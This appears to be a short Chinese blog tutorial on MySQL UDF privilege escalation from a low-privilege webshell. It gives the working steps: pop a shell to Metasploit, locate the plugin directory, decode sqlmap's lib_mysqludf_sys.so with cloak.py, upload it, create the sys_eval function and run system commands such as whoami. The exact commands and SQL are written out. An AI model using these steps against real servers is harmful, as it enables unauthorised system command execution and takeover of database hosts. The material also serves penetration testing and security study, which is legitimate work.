如果我们拿到的webshell权限较低,但是如果mysql是以高权限运行的,我们可以用mysql udf提权。
拿到webshell后先弹个shell到msf
拿到phpmyadmin的路径
查一下插件路径
对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可
我们要对udf文件进行解码
cd /usr/share/sqlmap/extra/cloak/ python cloak.py -d -i /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_
其中,lib_mysqludf_sys.so_是原文件,lib_mysqludf_sys.so是解码后的文件
把lib_mysqludf_sys.so传到插件目录
利用第上传的lib_mysqludf_sys.so文件,创建一个MySQL函数sys_eval
create function sys_eval returns string soname "lib_mysqludf_sys.so"
执行系统命令
select sys_eval('whoami')
评论 (0)